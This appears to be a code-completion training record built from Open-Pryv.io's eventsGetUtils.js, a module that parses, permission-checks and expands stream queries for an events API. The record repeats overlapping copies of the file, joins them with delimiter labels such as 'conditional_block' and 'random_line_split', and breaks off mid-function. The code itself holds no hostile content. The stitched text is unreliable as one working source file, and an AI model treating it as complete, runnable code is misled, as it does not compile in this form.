function parseStreamsParams(input: string): ?StreamQuery | ?Array<StreamQuery> {
try {
return JSON.parse(input);
} catch (e) {
throw errors.invalidRequestStructure('Invalid "streams" parameter. It should be an array of streamIds or JSON logical query. Error while parsing JSON ' + e, input);
}
}
/**
* we detect if it's JSON by looking at first char.
* Note: since RFC 7159 JSON can also starts with ", true, false or number - this does not apply in this case.
* @param {string} input
*/
function isStringifiedJSON(input: any): boolean {
return (typeof input === 'string') && ['[', '{'].includes(input.substr(0, 1));
}
function isStringOrArrayOfStrings(input: any): boolean {
if (typeof input === 'string') return true;
if (! Array.isArray(input)) return false;
for (const item of input) {
if (typeof item !== 'string') return false;
}
return true;
}
}
// Middleware: fills in default values for events.get parameters and derives
// the time window (fromTime/toTime) and the default item limit.
async function applyDefaultsForRetrieval(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
  _.defaults(params, {
    streams: [{ any: ['*'] }],
    tags: null,
    types: null,
    fromTime: null,
    toTime: null,
    sortAscending: false,
    skip: null,
    limit: null,
    state: 'default',
    modifiedSince: null,
    includeDeletions: false
  });
  // toTime alone: default fromTime to 24 hours earlier
  if (params.fromTime == null && params.toTime != null) {
    params.fromTime = timestamp.add(params.toTime, -24 * 60 * 60);
  }
  // fromTime alone: default toTime to "now"
  if (params.fromTime != null && params.toTime == null) {
    params.toTime = timestamp.now();
  }
  if (params.fromTime == null && params.toTime == null && params.limit == null) {
    // limit to 20 items by default
    params.limit = 20;
  }
  next();
}
function transformArrayOfStringsToStreamsQuery(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
try {
params.arrayOfStreamQueries = streamsQueryUtils.transformArrayOfStringsToStreamsQuery(params.streams);
} catch (e) {
return next(errors.invalidRequestStructure(e, params.streams));
}
next();
}
// Middleware (step 3 of the stream-query flow): validates stream-query syntax
// and — presumably in place, via streamsQueryUtils — annotates each query with
// its storeId; TODO confirm against streamsQueryUtils. On success the same
// array is re-exposed as params.arrayOfStreamQueriesWithStoreId.
function validateStreamsQueriesAndSetStore(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
  try {
    streamsQueryUtils.validateStreamsQueriesAndSetStore(params.arrayOfStreamQueries);
    // same array reference, now carrying storeIds
    params.arrayOfStreamQueriesWithStoreId = params.arrayOfStreamQueries;
  } catch (e) {
    return next(errors.invalidRequestStructure('Initial filtering: ' + e, params.streams));
  }
  next();
}
// the two tasks are joined as '*' replaced have their permissions checked
async function streamQueryCheckPermissionsAndReplaceStars(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
context.tracing.startSpan('streamQueries');
const unAuthorizedStreamIds: Array<string> = [];
const unAccessibleStreamIds: Array<string> = [];
async function streamExistsAndCanGetEventsOnStream(streamId: string, storeId: string,
unAuthorizedStreamIds: Array<string>, unAccessibleStreamIds: Array<string>): Promise<void> {
// remove eventual '#' in streamQuery
const cleanStreamId: string = streamId.startsWith('#') ? streamId.substr(1) : streamId;
const stream: Stream = await context.streamForStreamId(cleanStreamId, storeId);
if (stream == null) {
unAccessibleStreamIds.push(cleanStreamId);
return;
}
if (! await context.access.canGetEventsOnStream(cleanStreamId, storeId)) {
unAuthorizedStreamIds.push(cleanStreamId);
}
}
for (const streamQuery: StreamQueryWithStoreId of params.arrayOfStreamQueriesWithStoreId) {
// ------------ "*" case
if (streamQuery.any && streamQuery.any.includes('*')) {
if (await context.access.canGetEventsOnStream('*', streamQuery.storeId)) continue; // We can keep star
// replace any by allowed streams for reading
const canReadStreamIds: Array<string> = [];
for (const streamPermission of context.access.getStoresPermissions(streamQuery.storeId)) {
if (await context.access.canGetEventsOnStream(streamPermission.streamId, streamQuery.storeId)) {
canReadStreamIds.push(streamPermission.streamId);
}
}
streamQuery.any = canReadStreamIds;
} else { // ------------ All other cases
/**
* ! we don't have to check for permissions on 'all' or 'not' as long there is at least one 'any' authorized.
*/
if (streamQuery?.any?.length === 0) {
return next(errors.invalidRequestStructure('streamQueries must have a valid {any: [...]} component'));
}
for (const streamId: string of streamQuery.any) {
await streamExistsAndCanGetEventsOnStream(streamId, streamQuery.storeId, unAuthorizedStreamIds, unAccessibleStreamIds);
};
}
}
if (unAuthorizedStreamIds.length > 0) {
context.tracing.finishSpan('streamQueries');
return next(errors.forbidden('stream [' + unAuthorizedStreamIds[0] + '] has not sufficent permission to get events'));
}
if (unAccessibleStreamIds.length > 0) {
context.tracing.finishSpan('streamQueries');
return next(errors.unknownReferencedResource(
'stream' + (unAccessibleStreamIds.length > 1 ? 's' : ''),
'streams',
unAccessibleStreamIds));
}
next();
}
/**
* Add "forced" and "none" events from permissions
*/
function streamQueryAddForcedAndForbiddenStreams(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
for (const streamQuery: StreamQueryWithStoreId of params.arrayOfStreamQueriesWithStoreId) {
// ------------ ALL --------------- //
// add forced Streams if exists
const forcedStreamIds: Array<string> = context.access.getForcedStreamsGetEventsStreamIds(streamQuery.storeId);
if (forcedStreamIds?.length > 0) {
if (streamQuery.all == null) streamQuery.all = [];
// TODO check for duplicates
streamQuery.all.push(...forcedStreamIds);
}
// ------------- NOT ------------- //
const forbiddenStreamIds: Array<string> = context.access.getForbiddenGetEventsStreamIds(streamQuery.storeId);
if (forbiddenStreamIds?.length > 0) {
if (streamQuery.not == null) streamQuery.not = [];
// TODO check for duplicates
streamQuery.not.push(...forbiddenStreamIds);
}
}
next();
}
async function streamQueryExpandStreams(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
async function expandStreamInContext(streamId: string, storeId: string, excludedIds) {
// remove eventual '#' in streamQuery
if (streamId.startsWith('#')) {
return [streamId.substr(1)]; // do not expand Stream
}
const query: StoreQuery = {
id: streamId,
storeId: storeId,
includeTrashed: params.state === 'all' || params.state === 'trashed',
expandChildren: true,
excludedIds: excludedIds
};
const tree: Array<Stream> = await mall.streams.get(context.user.id, query);
// collect streamIds
const resultWithPrefix: Array<string> = treeUtils.collectPluck(tree, 'id');
// remove storePrefix
const result: Array<string> = resultWithPrefix.map((fullStreamId: string) => StreamsUtils.storeIdAndStreamIdForStreamId(fullStreamId)[1]);
return result;
}
try {
params.arrayOfStreamQueriesWithStoreId = await streamsQueryUtils.expandAndTransformStreamQueries(params.arrayOfStreamQueriesWithStoreId, expandStreamInContext);
} catch (e) {
console.log(e);
context.tracing.finishSpan('streamQueries');
return next(e);
}
// delete streamQueries with no inclusions
params.arrayOfStreamQueriesWithStoreId = params.arrayOfStreamQueriesWithStoreId.filter(streamQuery => streamQuery.any != null || streamQuery.and != null);
context.tracing.finishSpan('streamQueries');
next();
}
/**
* - Create a copy of the params per query
* - Add specific stream queries to each of them
*/
async function findEventsFromStore(filesReadTokenSecret: string,
isStreamIdPrefixBackwardCompatibilityActive: boolean, isTagsBackwardCompatibilityActive: boolean,
context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
if (params.arrayOfStreamQueriesWithStoreId?.length === 0) {
result.events = [];
return next();
}
// in> params.fromTime = 2 params.streams = [{any: '*' storeId: 'local'}, {any: 'access-gasgsg', storeId: 'audit'}, {any: 'action-events.get', storeId: 'audit'}]
const paramsByStoreId: Map<string, GetEventsParams> = {};
for (const streamQuery: StreamQueryWithStoreId of params.arrayOfStreamQueriesWithStoreId) {
const storeId: string = streamQuery.storeId;
if (storeId == null) {
console.error('Missing storeId' + params.arrayOfStreamQueriesWithStoreId);
throw(new Error("Missing storeId" + params.arrayOfStreamQueriesWithStoreId));
}
if (paramsByStoreId[storeId] == null) {
paramsByStoreId[storeId] = _.cloneDeep(params); // copy the parameters
paramsByStoreId[storeId].streams = []; // empty the stream query
}
delete streamQuery.storeId;
paramsByStoreId[storeId].streams.push(streamQuery);
}
// out> paramsByStoreId = { local: {fromTime: 2, streams: [{any: '*}]}, audit: {fromTime: 2, streams: [{any: 'access-gagsg'}, {any: 'action-events.get}]}
/**
* Will be called by "mall" for each source of event that need to be streames to result
* @param {Store} store
* @param {ReadableStream} eventsStream of "Events"
*/
function addnewEventStreamFromSource (store, eventsStream: ReadableStream) {
let stream: ReadableStream = eventsStream;
if (isStreamIdPrefixBackwardCompatibilityActive && !context.disableBackwardCompatibility) {
stream = eventsStream.pipe(new ChangeStreamIdPrefixStream());
}
if (isTagsBackwardCompatibilityActive) {
stream = stream.pipe(new addTagsStream());
}
stream = stream.pipe(new SetSingleStreamIdStream());
if (store.settings?.attachments?.setFileReadToken) {
stream = stream.pipe(new SetFileReadTokenStream({ access: context.access, filesReadTokenSecret }));
}
result.addToConcatArrayStream('events', stream);
}
await mall.events.generateStreams(context.user.id, paramsByStoreId, addnewEventStreamFromSource);
result.closeConcatArrayStream('events');
return next();
}
// Resolves the module-level "mall" (events/streams store facade) once.
// Must complete before the middlewares that use `mall` run.
async function init() {
  mall = await getMall();
}
module.exports = {
init,
applyDefaultsForRetrieval,
coerceStreamsParam,
validateStreamsQueriesAndSetStore,
transformArrayOfStringsToStreamsQuery,
streamQueryCheckPermissionsAndReplaceStars,
streamQueryAddForcedAndForbiddenStreams,
streamQueryExpandStreams,
findEventsFromStore,
} | return next();
}
| conditional_block |
eventsGetUtils.js | /**
* @license
* Copyright (C) 2020-2021 Pryv S.A. https://pryv.com
*
* This file is part of Open-Pryv.io and released under BSD-Clause-3 License
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* 3. Neither the name of the copyright holder nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
* SPDX-License-Identifier: BSD-3-Clause
*/
// @flow
/**
* Some method used by events.get are shared with audit.getLogs
*/
const streamsQueryUtils = require('./streamsQueryUtils');
const _ = require('lodash');
const timestamp = require('unix-timestamp');
const errors = require('errors').factory;
const { getMall, StreamsUtils } = require('mall');
const { treeUtils } = require('utils');
const SetFileReadTokenStream = require('../streams/SetFileReadTokenStream');
const SetSingleStreamIdStream = require('../streams/SetSingleStreamIdStream');
const ChangeStreamIdPrefixStream = require('../streams/ChangeStreamIdPrefixStream');
const addTagsStream = require('../streams/AddTagsStream');
import type { Stream } from 'business/src/streams';
import type { StreamQuery, StreamQueryWithStoreId } from 'business/src/events';
import type { MethodContext } from 'business';
import type { ApiCallback } from '../../API';
import type Result from '../../Result';
export type GetEventsParams = {
streams?: Array<string> | string | StreamQuery | Array<StreamQuery>,
arrayOfStreamQueries?: Array<StreamQuery>,
arrayOfStreamQueriesWithStoreId?: Array<StreamQueryWithStoreId>,
tags?: Array<string>,
types?: Array<string>,
fromTime?: number,
toTime?: number,
sortAscending?: boolean,
skip?: number,
limit?: number,
state?: 'default' | 'all' | 'trashed',
modifiedSince?: number,
includeDeletions?: boolean,
};
export type StoreQuery = {
id: string,
storeId: string,
includeTrashed: boolean,
expandChildren: boolean,
excludedIds: Array<string>,
};
let mall;
/**
* # Stream Query Flow
* 1. coerceStreamParam:
* - null `streams` is changed to `[{any: ['*]}]
* - transform "stringified" `streams` by parsing JSON object
*
* 2. transformArrayOfStringsToStreamsQuery:
* For backwardCompatibility with older streams parameter ['A', 'B']
* - `streams: ['A', 'B', 'C']` => `streams: [{any: 'A'}, {any: 'B'}, {any: 'C'}]`
*
* 3. validateStreamsQueriesAndSetStore:
* - Check syntax and add storeId
* `streams: [{any: 'A'}, {any: ':_audit:B'}]` => `streams: [{any: 'A', storeId: 'local'}, {any: 'B', storeId: 'audit'}]`
*
* 4. streamQueryCheckPermissionsAndReplaceStars:
* For `stream.any`ONLY ! (we don't have to check NOT and ALL query as they only reduce scope)
 * - check if the stream exists and if the access has "read" rights on it
* - If "stream.any" contains "*" it's replaced by all root streams with "read" rights
*
* 5. streamQueryAddForcedAndForbiddenStreams
* - Add to streams query `all` streams declared as "forced"
* - Add to streams query `not` streams that must not be exposed permissions => with level = "none"
*
* 6. streamQueryExpandStreams
 * - Each "streamId" of the queries is "expanded" (i.e. transformed into an array of streamIds that includes the stream and its children)
* - Do not expand streams prefixed with a "#"
*
* - A callBack `expandStreamInContext`is used to link the expand process and the "store"
* This callBack is designed to be optimized on a Per-Store basis The current implementation is generic
* - If streamId is prefixed with a "#" just return the streamId without "#"
* - It queries the stores with and standard `store.streams.get({id: streamId, exludedIds: [....]})`
* and return an array of streams.
*
* - streamsQueryUtils.expandAndTransformStreamQueries
* Is in charge of handling 'any', 'all' and 'not' "expand" process
*
* - "any" is expanded first excluding streamIds in "not"
* => The result is kept in `any`
* - "all" is expanded in second excluding streamIds in "not"
 * `all` is transformed and each "expansion" is kept in `and: [{any: ,..}]`
* example: `{all: ['A', 'B']}` => `{and: [{any: [...expand('A')]}, {any: [...expand('B')]}]}`
* - "not" is expanded in third and added to `and` -- !! we exclude streamIds that are in 'any' as some authorization might have been given on child now expanded
* example: `{all: ['A'], not['B', 'C']}` => `{and: [{any: [...expand('A')]}, {not: [...expand('B')...expand('C')]}]}
*
*/
function coerceStreamsParam(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
if (params.streams == null) {
return next();
}
if (! context.acceptStreamsQueryNonStringified) {
if (isStringifiedJSON(params.streams)) {
try {
params.streams = parseStreamsParams(params.streams);
} catch (e) {
return next(e);
}
} else if (isStringOrArrayOfStrings(params.streams)) {
// good, do nothing
} else {
return next(errors.invalidRequestStructure('Invalid "streams" parameter. It should be an array of streamIds or JSON logical query.'))
}
} else {
if (isStringifiedJSON(params.streams)) {
try {
params.streams = parseStreamsParams(params.streams);
} catch (e) {
return next(e);
}
} else {
// good, do nothing
}
}
// Transform object or string to Array
if (!Array.isArray(params.streams)) {
params.streams = [params.streams];
}
next();
function parseStreamsParams(input: string): ?StreamQuery | ?Array<StreamQuery> {
try {
return JSON.parse(input);
} catch (e) {
throw errors.invalidRequestStructure('Invalid "streams" parameter. It should be an array of streamIds or JSON logical query. Error while parsing JSON ' + e, input);
}
}
/**
* we detect if it's JSON by looking at first char.
* Note: since RFC 7159 JSON can also starts with ", true, false or number - this does not apply in this case.
* @param {string} input
*/
function isStringifiedJSON(input: any): boolean {
return (typeof input === 'string') && ['[', '{'].includes(input.substr(0, 1));
}
function isStringOrArrayOfStrings(input: any): boolean {
if (typeof input === 'string') return true;
if (! Array.isArray(input)) return false;
for (const item of input) {
if (typeof item !== 'string') return false;
}
return true;
}
}
async function applyDefaultsForRetrieval(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
_.defaults(params, {
streams: [{ any: ['*'] }],
tags: null,
types: null,
fromTime: null,
toTime: null,
sortAscending: false,
skip: null,
limit: null,
state: 'default',
modifiedSince: null,
includeDeletions: false
});
if (params.fromTime == null && params.toTime != null) {
params.fromTime = timestamp.add(params.toTime, -24 * 60 * 60);
}
if (params.fromTime != null && params.toTime == null) {
params.toTime = timestamp.now();
}
if (params.fromTime == null && params.toTime == null && params.limit == null) {
// limit to 20 items by default
params.limit = 20;
}
next();
}
// Middleware (step 2 of the stream-query flow): converts the legacy
// `streams: ['A', 'B']` form into stream queries `[{any: 'A'}, {any: 'B'}]`
// by delegating to streamsQueryUtils. Result lands in params.arrayOfStreamQueries.
function transformArrayOfStringsToStreamsQuery(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
  try {
    params.arrayOfStreamQueries = streamsQueryUtils.transformArrayOfStringsToStreamsQuery(params.streams);
  } catch (e) {
    // malformed stream queries are surfaced as an invalid-request error
    return next(errors.invalidRequestStructure(e, params.streams));
  }
  next();
}
function validateStreamsQueriesAndSetStore(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
try {
streamsQueryUtils.validateStreamsQueriesAndSetStore(params.arrayOfStreamQueries);
params.arrayOfStreamQueriesWithStoreId = params.arrayOfStreamQueries;
} catch (e) {
return next(errors.invalidRequestStructure('Initial filtering: ' + e, params.streams));
}
next();
}
// Permission check and '*' replacement are joined in one pass because the
// streamIds substituted for '*' must themselves pass the permission check.
/**
 * For each stream query: if `any` contains '*', keep it when the access can
 * read the whole store, otherwise replace it with the streamIds the access
 * may read; for explicit `any` entries, verify each stream exists and is
 * readable. Fails with forbidden (first unauthorized id) or
 * unknownReferencedResource (unknown ids). `all`/`not` are not checked here
 * as they only narrow the scope.
 */
async function streamQueryCheckPermissionsAndReplaceStars(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
context.tracing.startSpan('streamQueries');
const unAuthorizedStreamIds: Array<string> = [];
const unAccessibleStreamIds: Array<string> = [];
// Collects offenders into the two arrays instead of failing fast, so the
// error can report after the whole walk.
async function streamExistsAndCanGetEventsOnStream(streamId: string, storeId: string,
unAuthorizedStreamIds: Array<string>, unAccessibleStreamIds: Array<string>): Promise<void> {
// remove eventual '#' in streamQuery
const cleanStreamId: string = streamId.startsWith('#') ? streamId.substr(1) : streamId;
const stream: Stream = await context.streamForStreamId(cleanStreamId, storeId);
if (stream == null) {
unAccessibleStreamIds.push(cleanStreamId);
return;
}
if (! await context.access.canGetEventsOnStream(cleanStreamId, storeId)) {
unAuthorizedStreamIds.push(cleanStreamId);
}
}
for (const streamQuery: StreamQueryWithStoreId of params.arrayOfStreamQueriesWithStoreId) {
// ------------ "*" case
if (streamQuery.any && streamQuery.any.includes('*')) {
if (await context.access.canGetEventsOnStream('*', streamQuery.storeId)) continue; // We can keep star
// replace any by allowed streams for reading
const canReadStreamIds: Array<string> = [];
for (const streamPermission of context.access.getStoresPermissions(streamQuery.storeId)) {
if (await context.access.canGetEventsOnStream(streamPermission.streamId, streamQuery.storeId)) {
canReadStreamIds.push(streamPermission.streamId);
}
}
streamQuery.any = canReadStreamIds;
} else { // ------------ All other cases
/**
* ! we don't have to check for permissions on 'all' or 'not' as long there is at least one 'any' authorized.
*/
if (streamQuery?.any?.length === 0) {
return next(errors.invalidRequestStructure('streamQueries must have a valid {any: [...]} component'));
}
for (const streamId: string of streamQuery.any) {
await streamExistsAndCanGetEventsOnStream(streamId, streamQuery.storeId, unAuthorizedStreamIds, unAccessibleStreamIds);
};
}
}
if (unAuthorizedStreamIds.length > 0) {
context.tracing.finishSpan('streamQueries');
return next(errors.forbidden('stream [' + unAuthorizedStreamIds[0] + '] has not sufficent permission to get events'));
}
if (unAccessibleStreamIds.length > 0) {
context.tracing.finishSpan('streamQueries');
return next(errors.unknownReferencedResource(
'stream' + (unAccessibleStreamIds.length > 1 ? 's' : ''),
'streams',
unAccessibleStreamIds));
}
next();
}
/**
 * Add permission-derived constraints to every stream query:
 * - streamIds the access is forced to include go into `all`
 * - streamIds with "none" (forbidden) level go into `not`
 */
function streamQueryAddForcedAndForbiddenStreams(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
for (const streamQuery: StreamQueryWithStoreId of params.arrayOfStreamQueriesWithStoreId) {
// ------------ ALL --------------- //
// add forced Streams if exists
const forcedStreamIds: Array<string> = context.access.getForcedStreamsGetEventsStreamIds(streamQuery.storeId);
if (forcedStreamIds?.length > 0) {
if (streamQuery.all == null) streamQuery.all = [];
// TODO check for duplicates
streamQuery.all.push(...forcedStreamIds);
}
// ------------- NOT ------------- //
const forbiddenStreamIds: Array<string> = context.access.getForbiddenGetEventsStreamIds(streamQuery.storeId);
if (forbiddenStreamIds?.length > 0) {
if (streamQuery.not == null) streamQuery.not = [];
// TODO check for duplicates
streamQuery.not.push(...forbiddenStreamIds);
}
}
next();
}
async function streamQueryExpandStreams(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
async function expandStreamInContext(streamId: string, storeId: string, excludedIds) {
// remove eventual '#' in streamQuery
if (streamId.startsWith('#')) {
return [streamId.substr(1)]; // do not expand Stream
}
const query: StoreQuery = {
id: streamId,
storeId: storeId,
includeTrashed: params.state === 'all' || params.state === 'trashed',
expandChildren: true,
excludedIds: excludedIds
};
const tree: Array<Stream> = await mall.streams.get(context.user.id, query);
// collect streamIds
const resultWithPrefix: Array<string> = treeUtils.collectPluck(tree, 'id');
// remove storePrefix
const result: Array<string> = resultWithPrefix.map((fullStreamId: string) => StreamsUtils.storeIdAndStreamIdForStreamId(fullStreamId)[1]);
return result;
}
try {
params.arrayOfStreamQueriesWithStoreId = await streamsQueryUtils.expandAndTransformStreamQueries(params.arrayOfStreamQueriesWithStoreId, expandStreamInContext);
} catch (e) {
console.log(e);
context.tracing.finishSpan('streamQueries');
return next(e);
}
// delete streamQueries with no inclusions
params.arrayOfStreamQueriesWithStoreId = params.arrayOfStreamQueriesWithStoreId.filter(streamQuery => streamQuery.any != null || streamQuery.and != null);
context.tracing.finishSpan('streamQueries');
next();
} | * - Add specific stream queries to each of them
*/
/**
 * Split the stream queries per store, clone the remaining parameters for
 * each store, then ask the mall to stream matching events into `result`
 * through optional backward-compatibility transforms.
 */
async function findEventsFromStore(filesReadTokenSecret: string,
isStreamIdPrefixBackwardCompatibilityActive: boolean, isTagsBackwardCompatibilityActive: boolean,
context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
if (params.arrayOfStreamQueriesWithStoreId?.length === 0) {
// no query survived filtering: nothing to fetch
result.events = [];
return next();
}
// in> params.fromTime = 2 params.streams = [{any: '*' storeId: 'local'}, {any: 'access-gasgsg', storeId: 'audit'}, {any: 'action-events.get', storeId: 'audit'}]
// NOTE(review): despite the Map annotation this is a plain object keyed by storeId
const paramsByStoreId: Map<string, GetEventsParams> = {};
for (const streamQuery: StreamQueryWithStoreId of params.arrayOfStreamQueriesWithStoreId) {
const storeId: string = streamQuery.storeId;
if (storeId == null) {
console.error('Missing storeId' + params.arrayOfStreamQueriesWithStoreId);
throw(new Error("Missing storeId" + params.arrayOfStreamQueriesWithStoreId));
}
if (paramsByStoreId[storeId] == null) {
paramsByStoreId[storeId] = _.cloneDeep(params); // copy the parameters
paramsByStoreId[storeId].streams = []; // empty the stream query
}
delete streamQuery.storeId;
paramsByStoreId[storeId].streams.push(streamQuery);
}
// out> paramsByStoreId = { local: {fromTime: 2, streams: [{any: '*}]}, audit: {fromTime: 2, streams: [{any: 'access-gagsg'}, {any: 'action-events.get}]}
/**
* Called by "mall" for each source of events that needs to be streamed to the result
* @param {Store} store
* @param {ReadableStream} eventsStream of "Events"
*/
function addnewEventStreamFromSource (store, eventsStream: ReadableStream) {
let stream: ReadableStream = eventsStream;
if (isStreamIdPrefixBackwardCompatibilityActive && !context.disableBackwardCompatibility) {
stream = eventsStream.pipe(new ChangeStreamIdPrefixStream());
}
if (isTagsBackwardCompatibilityActive) {
stream = stream.pipe(new addTagsStream());
}
stream = stream.pipe(new SetSingleStreamIdStream());
if (store.settings?.attachments?.setFileReadToken) {
stream = stream.pipe(new SetFileReadTokenStream({ access: context.access, filesReadTokenSecret }));
}
result.addToConcatArrayStream('events', stream);
}
await mall.events.generateStreams(context.user.id, paramsByStoreId, addnewEventStreamFromSource);
result.closeConcatArrayStream('events');
return next();
}
async function init() {
mall = await getMall();
}
module.exports = {
init,
applyDefaultsForRetrieval,
coerceStreamsParam,
validateStreamsQueriesAndSetStore,
transformArrayOfStringsToStreamsQuery,
streamQueryCheckPermissionsAndReplaceStars,
streamQueryAddForcedAndForbiddenStreams,
streamQueryExpandStreams,
findEventsFromStore,
} |
/**
* - Create a copy of the params per query | random_line_split |
eventsGetUtils.js | /**
* @license
* Copyright (C) 2020-2021 Pryv S.A. https://pryv.com
*
* This file is part of Open-Pryv.io and released under BSD-Clause-3 License
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* 3. Neither the name of the copyright holder nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
* SPDX-License-Identifier: BSD-3-Clause
*/
// @flow
/**
* Some method used by events.get are shared with audit.getLogs
*/
const streamsQueryUtils = require('./streamsQueryUtils');
const _ = require('lodash');
const timestamp = require('unix-timestamp');
const errors = require('errors').factory;
const { getMall, StreamsUtils } = require('mall');
const { treeUtils } = require('utils');
const SetFileReadTokenStream = require('../streams/SetFileReadTokenStream');
const SetSingleStreamIdStream = require('../streams/SetSingleStreamIdStream');
const ChangeStreamIdPrefixStream = require('../streams/ChangeStreamIdPrefixStream');
const addTagsStream = require('../streams/AddTagsStream');
import type { Stream } from 'business/src/streams';
import type { StreamQuery, StreamQueryWithStoreId } from 'business/src/events';
import type { MethodContext } from 'business';
import type { ApiCallback } from '../../API';
import type Result from '../../Result';
export type GetEventsParams = {
streams?: Array<string> | string | StreamQuery | Array<StreamQuery>,
arrayOfStreamQueries?: Array<StreamQuery>,
arrayOfStreamQueriesWithStoreId?: Array<StreamQueryWithStoreId>,
tags?: Array<string>,
types?: Array<string>,
fromTime?: number,
toTime?: number,
sortAscending?: boolean,
skip?: number,
limit?: number,
state?: 'default' | 'all' | 'trashed',
modifiedSince?: number,
includeDeletions?: boolean,
};
export type StoreQuery = {
id: string,
storeId: string,
includeTrashed: boolean,
expandChildren: boolean,
excludedIds: Array<string>,
};
let mall;
/**
* # Stream Query Flow
* 1. coerceStreamParam:
* - null `streams` is changed to `[{any: ['*']}]`
* - transform "stringified" `streams` by parsing JSON object
*
* 2. transformArrayOfStringsToStreamsQuery:
* For backwardCompatibility with older streams parameter ['A', 'B']
* - `streams: ['A', 'B', 'C']` => `streams: [{any: 'A'}, {any: 'B'}, {any: 'C'}]`
*
* 3. validateStreamsQueriesAndSetStore:
* - Check syntax and add storeId
* `streams: [{any: 'A'}, {any: ':_audit:B'}]` => `streams: [{any: 'A', storeId: 'local'}, {any: 'B', storeId: 'audit'}]`
*
* 4. streamQueryCheckPermissionsAndReplaceStars:
* For `stream.any`ONLY ! (we don't have to check NOT and ALL query as they only reduce scope)
* - check if the stream exists and if it has "read" access
* - If "stream.any" contains "*" it's replaced by all root streams with "read" rights
*
* 5. streamQueryAddForcedAndForbiddenStreams
* - Add to streams query `all` streams declared as "forced"
* - Add to streams query `not` streams that must not be exposed permissions => with level = "none"
*
* 6. streamQueryExpandStreams
* - Each "streamId" of the queries is "expanded" (i.e. transformed into an array of streamIds that includes the stream and its children)
* - Do not expand streams prefixed with a "#"
*
* - A callBack `expandStreamInContext`is used to link the expand process and the "store"
* This callBack is designed to be optimized on a Per-Store basis The current implementation is generic
* - If streamId is prefixed with a "#" just return the streamId without "#"
* - It queries the stores with and standard `store.streams.get({id: streamId, exludedIds: [....]})`
* and return an array of streams.
*
* - streamsQueryUtils.expandAndTransformStreamQueries
* Is in charge of handling 'any', 'all' and 'not' "expand" process
*
* - "any" is expanded first excluding streamIds in "not"
* => The result is kept in `any`
* - "all" is expanded in second excluding streamIds in "not"
* `all` is tranformed and each "expansion" is kept in `and: [{any: ,..}]`
* example: `{all: ['A', 'B']}` => `{and: [{any: [...expand('A')]}, {any: [...expand('B')]}]}`
* - "not" is expanded in third and added to `and` -- !! we exclude streamIds that are in 'any' as some authorization might have been given on child now expanded
* example: `{all: ['A'], not['B', 'C']}` => `{and: [{any: [...expand('A')]}, {not: [...expand('B')...expand('C')]}]}
*
*/
/**
 * Normalize the raw `streams` parameter:
 * - stringified JSON queries are parsed;
 * - when context.acceptStreamsQueryNonStringified is off, anything that is
 *   neither stringified JSON nor a string / array of strings is rejected;
 * - a single value is wrapped so params.streams is always an array.
 * A null `streams` is left for applyDefaultsForRetrieval to fill.
 */
